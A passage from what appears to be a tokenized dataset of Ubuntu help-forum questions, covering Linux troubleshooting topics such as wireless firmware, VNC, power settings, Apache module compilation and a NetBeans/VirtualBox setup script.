above output , which returns the following output : install_dir /usr/local/lib/python2.6/dist-packages/ searching for distribute reading http : //pypi.python.org/simple/distribute/ reading http : //packages.python.org/distribute best match : distribute 0.6.24 processing distribute-0.6.24-py2.6.egg distribute 0.6.24 is already the active version in easy-install.pth installing easy_install script to /usr/local/bin installing easy_install-2.6 script to /usr/local/bin using /usr/local/lib/python2.6/dist-packages/distribute-0.6.24-py2.6.egg processing dependencies for distribute finished processing dependencies for distribute i 'm running ubuntu 10.04 64-bit server if that helps any .
95282	i still have 9.04 but it 's on an old computer without a cd burner . pretty self explanatory ... ?	i tried to upgrade ( 9.04 to 9.10 of course ) ... 'fetching the upgrade failed . there may be a network problem . ' any suggestions or ways to work around this problem ?
95292	desktop freezes when pressed minimized button in maximized windows in unity	i am using ubuntu 11.10 x64 . ubuntu freezes when i pressed minimize button when in maximized windows but minimize button works well in non-maximized ( restored ) windows . also , the unity sidebar does n't shows occasionally when hovered in left .
95293	wireless firmware installation w/no connection	i just installed ubuntu 11.10 on a compaq presario v5000 ( v5102nr specific ) and ca n't get the wireless network to work ( 54g 802.11b/g wlan with 125hsm bcm4318 ) . i 've tried to install by copying b43-fwcutter-015 & b43 1.5 into /lib/firmware/ file to not avail . i used this command to input them : sudo cp -r ~/wireless/* /lib/firmware/ my wireless did n't work after restart and now i ca n't delete these files becuase i do n't have owner permission even though i changed my group to root . the current settings say : kernel river in use : b43-pci-bridge kernel modules : ssb network connection still says firmware missing . i do not have a wired connection although i do have another laptop thats connected to a hotspot . i 've been trying all day . help ! ! ! ! note : my first time using ubuntu or any linux based os .
95294	vnc suddenly stops receiving connections	i have a fit pc that essentially runs just a subversion server and as a test server for web applications . i upgraded a while back to 10.04 lts and no issues . i do n't have any keyboard or monitor installed on it , i just access the desktop through vnc , and while a little slow , it works perfectly fine . suddenly , today , i 'm having an issue accessing subversion . i tried to vnc to the machine , but it 's refusing connections . i 've ssh into the server and reboot , but still no dice . i can manage ok ( usually ) on my own with the desktop , but i do n't use the terminal very often , so i 'm kind of stuck now and hoping someone has an idea ... i can confirm that the vnc server is being started at startup . i run netstat and can see the following : ( not all processes could be identified , non-owned process info will not be shown , you would have to be root to see it all . ) active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:5901 0.0.0.0 : * listen 4261/xtightvnc tcp 0 0 0.0.0.0:111 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:6000 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:6001 0.0.0.0 : * listen 4261/xtightvnc tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen - tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:60888 0.0.0.0 : * listen - tcp6 0 0 : ::80 : : : * listen - tcp6 0 0 : ::6000 : : : * listen - tcp6 0 0 : ::22 : : : * listen - tcp6 0 0 : :1:631 : : : * listen - which i presume to mean vnc is listening to port 5901 . do n't know what else to do from here . any help would be appreciated .
95295	how to prevent screen locking when lid is closed ?	i have ubuntu 11.10 with gnome 3 ( no unity ) , gnome-screen-saver has been removed and replaced with xscreensaver . the screensaver stuff all works fine -- no complaints there . when i close my laptop lid , even for a second , the screen locks ( and the dialog box asking for my password is xscreensaver 's ) . i 'd like for this not to happen ... things i 've tried/looked at already : xscreensaver settings - the `` lock screen after '' checkbox is not checked ( though i 've also tried it checked and set to 720 minutes ) gconf-editor - apps - > gnome-screensaver - > lock_enabled is not checked system settings - > power - `` when the lid is closed '' is set to `` do nothing '' for both battery and a/c system settings - > screen - lock is `` off '' gconf-editor - apps - > gnome-power-manager - > buttons - > lid_ac & & lid_battery are both set to `` nothing '' dconf-editor - apps - > org - > gnome - > desktop - > screensaver - > lock_enabled is not checked output from : gsettings list-recursively org.gnome.settings-daemon.plugins.power : org.gnome.settings-daemon.plugins.power active true org.gnome.settings-daemon.plugins.power button-hibernate 'hibernate' org.gnome.settings-daemon.plugins.power button-power 'suspend' org.gnome.settings-daemon.plugins.power button-sleep 'suspend' org.gnome.settings-daemon.plugins.power button-suspend 'suspend' org.gnome.settings-daemon.plugins.power critical-battery-action 'hibernate' org.gnome.settings-daemon.plugins.power idle-brightness 30 org.gnome.settings-daemon.plugins.power idle-dim-ac false org.gnome.settings-daemon.plugins.power idle-dim-battery true org.gnome.settings-daemon.plugins.power idle-dim-time 10 org.gnome.settings-daemon.plugins.power lid-close-ac-action 'nothing' org.gnome.settings-daemon.plugins.power lid-close-battery-action 'nothing' org.gnome.settings-daemon.plugins.power notify-perhaps-recall true org.gnome.settings-daemon.plugins.power percentage-action 2 org.gnome.settings-daemon.plugins.power percentage-critical 3 org.gnome.settings-daemon.plugins.power percentage-low 10 org.gnome.settings-daemon.plugins.power priority 1 org.gnome.settings-daemon.plugins.power sleep-display-ac 600 org.gnome.settings-daemon.plugins.power sleep-display-battery 600 org.gnome.settings-daemon.plugins.power sleep-inactive-ac false org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 0 org.gnome.settings-daemon.plugins.power sleep-inactive-ac-type 'suspend' org.gnome.settings-daemon.plugins.power sleep-inactive-battery true org.gnome.settings-daemon.plugins.power sleep-inactive-battery-timeout 0 org.gnome.settings-daemon.plugins.power sleep-inactive-battery-type 'suspend' org.gnome.settings-daemon.plugins.power time-action 120 org.gnome.settings-daemon.plugins.power time-critical 300 org.gnome.settings-daemon.plugins.power time-low 1200 org.gnome.settings-daemon.plugins.power use-time-for-policy true gnome-settings-daemon is running : < ~ > $ ps -ef | grep gnome-settings-daemon 1000 1719 1645 0 19:37 ? 00:00:01 /usr/lib/gnome-settings-daemon/gnome-settings-daemon 1000 1726 1 0 19:37 ? 00:00:00 /usr/lib/gnome-settings-daemon/gsd-printer 1000 1774 1645 0 19:37 ? 00:00:00 /usr/lib/gnome-settings-daemon/gnome-fallback-mount-helper anything else i can check ? thanks !
95296	what printer should i buy ?	im would like to buy a printer . i already have a lexmark x2670 and have been horrible to make it work ( wich still without working ) so ... i want to know what printer brand is good to use and easy to install in ubuntu oneiric ( 11.10 ) ? thanks .
95300	removing packages through a list	i 'm running peppermint os two and it uses natty packages . i want to introduce some oneiric packages . as i go along i backup my list of packages and /var/cache/apt/archives . the plan is if i install something that breaks i can diff the lists and get a list of offending packages . is there a way through dpkg/apt/aptitude to remove packages by list ?
95301	how do i do a b43 legacy install on ubuntu 11.10 ?	i recently installed ubuntu onto an extra hard drive and everything booted correctly . however , my linksys wireless card is not working . i went though all the forums and walk throughs and i know that i need to install the b43 legacy firmware to get the card to work . when i try to install the files , i keep getting the message in terminal saying `` no such file or directory '' for every file i need to run . it 's ubuntu 11.10 on a dell optiplex gx280 . also , the `` pool '' file that is supposed to be on the file system is not there
95306	installation hangs on a macbook pro 5,1	i am trying to install the 64bit amd64 mac iso on my macbook pro 5,1 and i can only get to the ubuntu screen which allows you to choose the livecd option or the install now option ( plus some other choices ) . once i select either livecd or install now , i get a blank screen with a flashing cursor and nothing ... the system just hangs . i do have refit installed and have had earlier versions of ubuntu working on this laptop . i currently have only os x snow leopard installed and freed up about 80g of space for ubuntu . any suggestions are most appreciated .
95310	changing file permission in ubuntu live mode	how do i change the file permission of a file to 700 ? i am using ubuntu live cd . i tried sudo chmod 777 abc it does not change the permission and still shows : -rw-r -- r -- 1 ubuntu ubuntu 18 2012-01-14 03:02 abc using latest ubuntu 11+
95312	why do i sometimes log in twice ( instead of once ) ?	often , when i boot up my pc , the ubuntu 11.10 login screen prompts me to enter my login details ( as per normal ) , but after i 've done that , it asks me a second time . to be clear , i log in the first time . the screen goes black . the login screen appears a second time . i log in a second time , and it works . this happens often enough for me to question it .
95319	live usb + msi gt780/gt683	i 'm trying to install ubuntu , on my new laptop ( gt683 ) , but at boot from an usb live ubuntu , the boot freeze at usb hid . ( see `` screenshoot '' here ) what can i do to bypass this problem ? thank you . cyrbil .
95322	how do i compile mod_deflate ?	i want to enable compression in apache . for the same i am trying to use deflate module of apache . i have already installed apache 2 . but it is a default installation and in that mod_deflate is not enable . now i am compiling mod_deflate module by using following commands : cd /usr/local/src/httpd-2.2.21/modules/filters/ /usr/local/apache/bin/apxs -i -c -wl , lz mod_deflate.c after doing it i have added following line in my httpd.conf file loadmodule deflate_module modules/mod_deflate.so but as soon as i do syntax check i am getting following error httpd : syntax error on line 417 of /usr/local/apache/conf/httpd.conf : can not load /usr/local/apache/modules/mod_deflate.so into server : /usr/local/apache/modules/mod_deflate.so : undefined symbol : inflate following is the output of ldd command linux-gate.so.1 = > ( 0x00b2d000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0x00110000 ) /lib/ld-linux.so.2 ( 0x008e6000 ) please help as i dont want to compile apache again .
95325	how to find the name of the package manager ?	what command can i use to find the name of the package manager used by my os ?
95326	mouse driver problems / sony vaio keeps shutting down on its own	my mouse driver constantly freezes up in 11.10 and i ca n't seem to fix it . once it freezes i have to restart ... which means tons of restarts every day . i can barely get any work done . also as of the other day after installing some updates in the update manager my computer has decided to shut itself down randomly . it 's already happened 7 or 8 times today and about the same yesterday . i ca n't get it to stop .
95328	how to partially upgrade ubuntu 11.10 from ubuntu 11.04 ?	i need to solve it . when update-manager upgrades , it does not continue from previous upgrading state . i want to partially upgrade because connection is going slow .
95331	how to troubleshoot my unstable wireless connection ?	i have ubuntu 11.10 and i use a d-link dwa-110 usb device for receiving signal form my router . my connection drops down after a while ( sometimes minutes , sometimes hours ) . it seems to be connected to network , but the usb device just stops working . i discarded isp and router issues because my other desktop computer , with the same features but different wireless device , works perfectly . following this : help.ubuntu.com wireless trouble shooting guide ( i 'm almost sure it is a driver issue ) , i got this : $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 01 serial : 40:61:86:50:8f : d7 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport : ce00 ( size=256 ) memory : fd9ff000-fd9fffff memory : fda00000-fda1ffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan0 serial : 00:1e:58:99:4a:51 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=3.0.0-14-generic-pae firmware=1.7 ip=192.168.0.2 link=yes multicast=yes wireless=ieee 802.11bg as you can see , my driver is rt73usb . this is what i got with lsmod : $ lsmod module size used by rfcomm 38408 0 bnep 17923 2 bluetooth 148839 10 rfcomm , bnep parport_pc 32114 0 ppdev 12849 0 binfmt_misc 17292 1 arc4 12473 2 snd_hda_codec_realtek 254125 1 rt73usb 27029 0 crc_itu_t 12627 1 rt73usb rt2x00usb 20092 1 rt73usb rt2x00lib 48114 2 rt73usb , rt2x00usb mac80211 393459 2 rt2x00usb , rt2x00lib cfg80211 172392 2 rt2x00lib , mac80211 snd_hda_intel 28358 2 snd_hda_codec 91754 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80435 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event usb_storage 44173 0 snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq uas 17699 0 snd 55902 13 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device usbhid 41905 0 hid 77367 1 usbhid i915 509290 3 drm_kms_helper 32889 1 i915 drm 196290 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 18908 1 i915 soundcore 12600 1 snd psmouse 63474 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm serio_raw 12990 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp r8169 47200 0 i do n't know what this line means : $ rt73usb 27029 0 but it does n't look good for me . please , help me . i love ubuntu , and this is the only ploblem i have with it . thank you in advance .
95332	upgrading my graphics card ( agp )	i 'm looking to upgrade my graphics card . i currently have a geforce fx 5950 ultra installed . i do n't want to buy a new motherboard , much less a new computer , so i 'm stuck with agp . i 'm looking at his 's radeon hd 4650 and 4670 , but i have no idea how well they work with ubuntu . the man page for the radeon says it is compatible , but i 've read bits of people having some issues . does anybody have any experience with them , or any recommendations for other agp cards ?
95336	why ca n't i update applications without upgrading the whole os ?	in ubuntu , once a release is out the software one has installed receives security updates only . in windows , i can get new versions of programs with new features . how can windows do this and why ca n't ubuntu ?
95337	what is the difference between the amd64 and amd64+mac images ?	i decided to download todays image for precise , and i saw that there was an image called precise-desktop-amd64.iso and one called precise-desktop-amd64+mac.iso . what is the difference between them ? http : //cdimage.ubuntu.com/daily-live/current/
95338	error `` media change : please insert disc labeled ... '' when installing an application	i 've tried several times to install radio tray on my fresh ubuntu 11.10 installation but when i run ~ $ sudo apt-get install radiotraythe following dialog pops up at the end of the script : media change : please insert the disc labeled 'ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) ' in the drive '/cdrom/ ' and press enter i 've performed previous installations of this app on another computer using the same repository and all went smooth . my ubuntu oneiric version was installed from a usb flash drive , so do n't understand that request from apt-get .
95345	how to make spotify the default music player ?	`` spotify for linux '' does n't show up in default applications menu for music ( system info section in system settings ) . therefore , it also does n't come in dash and music media keys do n't work as well . how to make it the default application for playing music or make media keys work ?
95346	world clock in gnome-shell	is there any shell extension which will enable ubuntu 11.10 gnome-shell users to view time at different locations ?
95348	apt-get hangs , waiting for suitable packages	after several tries on installing radiotray on ubuntu oneiric version , another user came up with the trouble being it the software sources settings . now that i want to perform the installation of radio tray again apt-get is hanged waiting for the suitable packages for radiotray . ca n't even end the process in system monitor . i 've already performed a logout and did n't kill it , probably a restart will do it . is there any other way to stop apt-get from running when it 's waiting for packages to download ?
95351	ubuntu desktop installation partition sizing formula	i want to reinstall ubuntu from scratch . i have read ( here and here ) that it is recommended to have 3 partitions for the desktop installation : root , home and swap as having a separate home and root can simplify the process if you want to upgrade or reinstall ubuntu ( if you break something by mistake ) . but there is no type of formula ( that i can find ) on how big each partition should be . i know this is somewhat dependant on what you plan to install . i want to have flexibility down the line to install new software without having to worry about shifting the partition sizes around . does anyone know of a formula or percentage breakdown that they have used to successfully calculate partition sizes ? i.e . x % of space will be allocated to the swap , y % of space to the root partition and z % of space to the home partition
95353	how to install libbow ?	does any one installed libbow on ubuntu 10.10 ? seems the code is not upgraded for latest compiler . when i try to follow the instruction to install the same , i got error during compilation stage . it was included in the source package for hardy . they removed it later .
95354	how to enable forwarding of data between two local interfaces ?	i have installed ubuntu 11.10 on a refurbished machine . i have also replaced a defective nic card with a new nic card , two nic cards are recognized when the install occurs . i also have squid installed as a proxy server . squid works well when all workstations are connected to the router . however ... . when i connect one nic to my router ( live internet connection available ) , the other nic to my switch ( without any internet available ) , i can create two separate networks , but i ca n't figure out how to make the two nic cards transfer data between themselves , as well as , across the two networks . i have tried to bridge both ethernet cards ... no luck ! i have tried to update iptables ... no luck ! i have set both nic cards to static addresses ... no luck ! i have configured one nic to use the other as a gateway ... no luck ! all result in an error that the pinged address ( network related to switch ) is on an unreachable destination . what am i missing ?
95357	default filesystem permissions and access rights in 12.04 ?	i have for many years on unix and linux systems as default set filsystem permissions and access rights to read and write for user ( i.e . myself ) , and only read permissions for group and others . in the case of directories everyone have got the execute permission , but the write permission has still been restricted to user . ( usually i am using the chmod command with octal option 644 for files and 755 for directories . ) i have not had any issues with this before , but recently ( i assume since ubuntu 11.10 ) i have found that ubuntu by default gives the write permission to group for newly created ( and downloaded ) files and directories . why does group get write permissions in ubuntu ? is this not an integrity issue on a multi-user system ? how to change the default system settings for access rights in case of creation of new files and directories ?
95359	creating unity appindicator icons	i want to create attention appindicator icon for my application . they are usually blue color , but i need exact color code in order to make it integrate in unity well . i found nothing on http : //unity.ubuntu.com/projects/appindicators/ . so , i need exact colors for dark ( radience ) , light ( ambiance ) and attention ( blue ) . can someone help ? there must be some guidline for creating this icons .
95360	how to get a stable wlan-connection with a lenovo x121e ?	i have permament problem when using wlan with my lenovo thinkpad x121e . the wireless network adapter in use is this one : lspci : 01:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) the connection normally works ok for some time and then starts to slow down and eventually disconnects . sometimes the connection is reestablished seconds later , sometimes it takes 30 or more seconds , sometimes it does not reconnect at all . this problem occures with every driver i tried up to now . especially the kernel driver linux thinkpad 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux and realteks driver that can be found here . the driver i 'm using at the moment is the one found in this ppa : ppa : tista/x120e . here is another link to www.thinkwiki.org that hints at a `` low power state '' ( lps ) option in realtek 's driver but it seems that it can not be disabled in the current driver . is there a way to get a more stable wlan with this setup ? some more system information : lshw -class network : description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : 38:59 : f9 : db : e6:83 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=0006.0321.2011 firmware=56 ip=192.168.178.35 latency=0 link=yes multicast=yes wireless=802.11bgn resources : irq:17 ioport:3000 ( size=256 ) memory : f0200000-f0203fff iwconfig wlan0 : wlan0 802.11bgn essid : '' xxx '' nickname : '' rtl8192ce '' mode : managed frequency=2.452 ghz access point : a2:05:43:2f:6e:8e bit rate=65 mb/s retry : on rts thr : off fragment thr : off power management period:0us mode : all packets received link quality=100/100 signal level=0 dbm noise level=-120 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 ifconfig wlan : wlan0 link encap : ethernet hwaddr 38:59 : f9 : db : e6:83 inet addr:192.168.178.35 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :3a59 : f9ff : fedb : e683/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:117385 errors:0 dropped:0 overruns:0 frame:0 tx packets:85652 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:115417879 ( 115.4 mb ) tx bytes:10463799 ( 10.4 mb ) interrupt:17 memory : ffffc900037a8000-ffffc900037a8100
95361	how do i test for truecrypt ?	i 'm fairly certain my ubuntu 11.10 install has truecrypt for my home directory , but how can i check . preferably without rebooting into a live disk install ?
95363	how do i use the volume indicator without installing pulseaudio ?	i had to remove pulseaudio as i need to use two different audio cards with skype ( a headphone is connected to one of them for use for phone calls while speakers for general usage are connected to the other audio card ) . now , skype works with alsa and everything is fine . except the fact i do no longer have a mixer tray icon . i installed alsa-tray with no effect . could you please tell me if there a way for : recover the volume icon in the tray without reinstalling pulseaudio
95365	bash is abnormal in makefile !	all , i have found that the same makefile works well in mac os x , but does not work in ubuntu . the snippet is as following : start : @ echo $ ( seperator ) @ if [ [ `` $ ( project ) '' == `` '' ] ] ; then \ echo `` project powered by codemate ! `` ; \ else \ echo `` $ ( project ) '' ; \ fi @ echo $ ( seperator ) and make complains : /bin/sh : [ [ : not found any idea ? cheers , li updates : i have changed the above conditional bash statements to : if test `` $ ( project ) '' = `` '' ; then \ then things work fine . so what is wrong with `` [ [ `` ?
95367	how do i install google gadgets ?	how to install google gadgets in ubuntu 11.10 ? any ppa s available ? .source code is available on their website how to package it ? if it is not packaged yet , how can i build it from source code ?
95368	bind mediatomb to one interface	i hava a ubuntu server ( 10.04 lst ) running mediatomb . the server is also a gateway to the network , so i want mediatomb only to listen on one interface . in the mediatomb config file etc/mediatomb/config.xml i already set < interface > eth2 < /interface > , but mediatomb is still available on the other interfaces .
95370	subtracting binary files	i have 2 binary files filea and filec its is such that filec = filea + fileb using the cat utility how do i subtract filea from filec to get fileb ?
95373	help or advice for my script	i have written the following script which you may find useful if running ubuntu on virtualbox and make use of netbeans . the scripts may even be used for other virtualbox needs as it tries to : install an application ( netbeans ) . tests if ubuntu is running with guest additions . tries to mount a shared folder based on the default project name which typically remains the same on any system ( host or guest ) . writes the mount to rc.local for use friendliness . creates and/or appends to a file in the users bin to allow the folder to be unmounted . the script works flawlessly unless you upgrade . in such a scenario , multiple mounts will be done and the unmount script will not function as intended as there will be multiple entries in /etc/mtab . this can not be solved with use of umount flags like -f -l -a -t as typically this may result in all mounts being unmounted . umount -a -t vboxsf on the /target is not the desired solution either as it may not be necessary to unmount all shared folders . i have come up with a solution , but am new to bash/scripting and do n't know how to implement it . my solution is to test rc.local for potential duplicate lines to avoid duplicate mounting : # ! /bin/bash # author : yucca nel http : //thejarbar.org # will restart system path= '' /sbin : /usr/sbin : /bin : /usr/bin '' export path # modify these variables as needed ... tempwork=/tmp/work startupscript=/etc/init.d/rc.local defaultnetbeansversion=7.0.1 echo `` provide netbeans version ( 7.0.1 is default ) then hit [ enter ] : '' read netbeansversion if [ -z `` $ netbeansversion '' ] then $ netbeansversion= $ defaultnetbeansversion fi mkdir -p / $ tempwork ; cd / $ tempwork ; wget http : //dlc.sun.com.edgesuite.net/netbeans/7.0.1/final/bundles/netbeans- $ netbeansversion-ml-javase-linux.sh ; sh $ tempwork/*sh ; # add netbeans launcher to your path . doing so allows you to run 'netbeans ' command from the terminal # this line will need to be changed if you changed the default install location ( iow netbeans is not in ~/ ) sudo ln -f -s ~/netbeans- $ netbeansversion/bin/netbeans /usr/bin/ ; # if you use virtualbox , you can share your projects between host and guest . name of shared # folder must match 'netbeansprojects' mkdir -p $ home/netbeansprojects if [ -f /sbin/mount.vboxsf ] then sudo /sbin/umount /home/ $ home/netbeansprojects sudo /sbin/mount.vboxsf netbeansprojects $ home/netbeansprojects fi if mountpoint -q ~/netbeansprojects then # add it to the universal start script to automate process ... sudo sed -ie ' $ d ' $ startupscript echo `` sudo /sbin/mount.vboxsf netbeansprojects $ home/netbeansprojects '' | sudo tee -a $ startupscript echo `` exit 0 '' | sudo tee -a $ startupscript sudo chmod +x $ startupscript # create a mount and unmount script file and add it to users local bin rm -rf $ tempwork/* echo ' # ! /bin/bash ' > $ tempwork/netbeans-mount.sh echo ' # ! /bin/bash ' > $ tempwork/netbeans-umount.sh echo ' # ! /bin/bash ' > $ tempwork/mount-from-host.sh echo ' # ! /bin/bash ' > $ tempwork/unmount-from-host.sh echo `` sudo /sbin/mount.vboxsf netbeansprojects $ home/netbeansprojects '' > > $ tempwork/netbeans-mount.sh echo `` sudo /sbin/mount.vboxsf netbeansprojects $ home/netbeansprojects '' > > $ tempwork/mount-from-host.sh echo `` sudo umount $ home/netbeansprojects '' > > $ tempwork/netbeans-umount.sh echo `` sudo umount $ home/netbeansprojects '' > > $ tempwork/unmount-from-host.sh echo `` exit 0 '' > > $ tempwork/unmount-from-host.sh echo `` exit 0 '' > > $ tempwork/mount-from-host.sh echo `` exit 0 '' > > $ tempwork/netbeans-mount.sh echo `` exit 0 '' > > $ tempwork/netbeans-umount.sh sudo chmod +x $ tempwork/* sudo mv -f $ tempwork/*.sh /usr/local/bin rm -rf $ tempwork fi # this function is used to cleanly exit with an error code . function error_exit { sleep 7 exit 1 } # restart sudo reboot exit 0 any pointers ? my goal is to write a super scripts for java developers that downloads most needed tools onto any linux ( not just ubuntu ) and mount potential things that do n't need to be reinstalled if you have an existing development host . things like maven , tomcat , svn , jboss do n't need special guest install if they are already on host system and there are further benefits in combining different systems into one ; e.g . windows can run photoshop and safari browser , but linux provides better customization and tools like ssh out the box .
95374	where can i find current laptop temperature ?	i have a script which logs information about my toshiba laptop , such as its current temperature , and sends that information to pachube . recently , i upgraded to ubuntu 11.11 and the kernel 3.0 series and my script stopped working . the temperature file , which used to be in /proc/acpi/thermal_zone/tz01/temperature now no longer exists . there is a relevant directory at /proc/acpi/toshiba/ but its contents are as follows : $ ls fan keys lcd version video $ cat * running : 0 force_on : 0 hotkey_ready : 0 hotkey : 0x0000 brightness : 7 brightness_levels : 8 driver : 0.19 proc_interface : 1 lcd_out : 0 crt_out : 0 tv_out : 0 $ so , no temperature . does anyone know a way to get this information ? is it still in /proc/ somewhere ?
95376	if kubuntu is based on ubuntu , then why does its installation give me problems ?	this might be an ignorant question , but i tried kubuntu recently . i 've heard that it merely has a different interface , but the backend is essentially ubuntu . yet , when i installed it , my sound did n't work properly and it did n't ask me to install the nvidia drivers . installing ubuntu , however , was a breeze . everything works and the software updater tells me what to install . is kubuntu 's backend different to ubuntu 's ?
95377	can i use crystal reports on monodevelop ?	i would like to know if i can use crystal reports in monodevelop . i have a project that was developed in visual basic .net ( windows ) and this project is using crystal report , so i 'd like to use this project in monodevelop on ubuntu 11.04 .
95381	unity bar and top menu bar have disappeared	ubuntu version 11.10 : my unity bar and top menu bar have disappeared . all other features are running , it has happened only for one login . my 2 year old who fiddled with the system seems to have given it more than it can handle ...
95383	how to connect external monitor to laptop for larger desktop ?	i have a laptop which has a intel 852gme chipset . i had an older laptop , i ca n't remember which chipset that has , but simply by doing a fresh install of ubuntu 10.04 , i was able to connect another monitor to the laptop via the vga port , and i would end up with a desktop spanning 2 screens , the laptop screen and the second screen , giving me a large desktop . this other laptop which has the intel 852gme chipset , that does n't happen . i ca n't even manually select another screen from the monitors dialog box . why is this and how do i enable the second monitor ? at the moment , i am getting a mirror image of the laptop screen on the second screen .
95384	tar unpack : unexpected eof in archive	i have downloaded `` eclipse-platform-3.7-linux-gtk-x86_64.tar.gz '' . using ubuntu 10.10 64-bit on intel 64-bit processor . while trying to unpack the contents ( either double-click or right-click & open-with-archive-manager ) . but it gives error as under : gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : error is not recoverable : exiting now is there any remedy to repair it ? or is the downloaded file corrupt & needs to be re-downloaded ? thanks in advance , vineet
95389	need copy of original sources.list for 10.04 ( 64-bit )	gentlemen , i borked my sources.list and rather than building another vm in order to pull the sources.list file , i was hoping someone here has a copy i could use . thanks
95391	how do i mount an sd card ?	my computer has an sd card slot . when i put a working sd card into the slot , nothing happens . when i put a cd or dvd in , or plug in a usb drive , the medium is mounted and available . is there something special i need to do for sd cards ? hardware specifics i am running 11.10 on a dell xps l502x . the card slot is marked `` sdxc/mmc - ms/pro '' ( which wikipedia tells me are various sd card types ) .
95392	how to create a bootable system with a squashfs root	my goal is to be able to take a customized root file system loaded with the software i want . so far i 've created a squashed filesystem using debootstrap and chroot to install the software i want on the system . the problem i am now running in to.. whenever i boot in to the system , my user accounts that were set up in the chroot do not work . first boot everything works out , second boot i ca n't log in . that is baffling to me . any one know a reason or a place to start looking ?
95393	nvidia drivers stretching out the desktop ?	i 'm using ubuntu 11.10 . my video card is g force gtx 560ti and it 's connected to hdtv lg rz37lz55 . when using the default linux driver , everything looks fine on res 1360x768 . however , when i install nvidia drivers , the desktop is stretch out to the point that i ca n't see or use the sidebar , nor can i see the top panel . changing the resolution to higher or lower does not pan the screen correctly . it is always stretched out . i am a total newbie in linux so most things i 've tried ended in crashing the system , for example adding horizontal and vertical refresh rates to xorg.conf . i can fit the screen using the nvidia x settings but that makes the desktop all blurry . i 'm using an older tv ( conected via dvi ) and i do n't have the option to chagne the borderlines in the tv menu . could anybody help me resolve this issue ?
95398	why is ubuntu slower than windows xp ?	my system config is-chipset - intel brookdale-g i845gevmotherboard - 01/25/2005-i845g-w627-6a69vm4yc-00video adapter - intel ( r ) 82845g/gl/ge/pe/gv graphics controller i have noticed that windows xp is way faster than ubuntu . are there any compatibility issues ? should i be using an older version of ubuntu , if yes which version ? please help .
95401	eclipse menu disappeared	somehow the eclipse menu disappeared suddenly.i do n't know what the problem is . i tried reinstalling and removing the eclipse configuration files from the home folder , and also tried a different user account but the problem stayed . also env ubuntu_menuproxy= eclipse for deactivating unity-appmenu did not change anything . ideas ?
95403	i can not recover files from trash	i accidentally deleted some large files ( 10gb which is associated with truecrypt ) but i didnt empty the trash . it is inside the trash , when i run bleachbit i see them but i ca n't recover those files from the trash .
95405	how to enable guest account automatic login ?	i noticed in ubuntu 11.10 , that finally there is possible to log in with guest account already from log in screen . the last step is remaining - how to enable the guest account automatically log in , e.g . when computer starts ? this would be very helpful for public computers , e.g . in libraries , schools , universities , student campus etc . this would be workaround for user account deep freeze feature , which is still missing from ubuntu . solution for ubuntu older than 13.10 solution for ubuntu 13.10 and newer
95409	problem with `` wired connection ''	i have windows and ubuntu installed on two partitions . i was having ubuntu 11.10 till now , where in i never had any issue with the wired network connectivity . when i click on the network icon on the `` taskbar '' sort of thing , i can see sections for both `` wired network '' and `` wireless network '' , and the wired network shows the network details when i simply plug in the lan cable . this works perfectly - just plug in and you are ready to go with wired internet . i had to remove v11.10 and install v10.04 lts of ubuntu recently . here , after installation i noticed that when you click the same network icon in the `` taskbar '' sort of thing , the section for `` wired network '' itself is missing . instead , all i am presented are the wireless networks that are available in the vicinity . i tried adding a wired network using the network manager applet , but still it does not list the wired network details . plugging in the lan cable has absolutely no effect on the system . no response . i reverted to v11.10 , and my wired network just simply works like magic . please tell me what is going wrong with ubuntu v10.04 lts in my system . since i am pretty new to linux , please elaborate if possible any technical steps i need to take .
95419	missing samba upstart job	somehow my k20samba4 was deleted . how can i restore it ( ie does anyone know where i can get the script ) ?
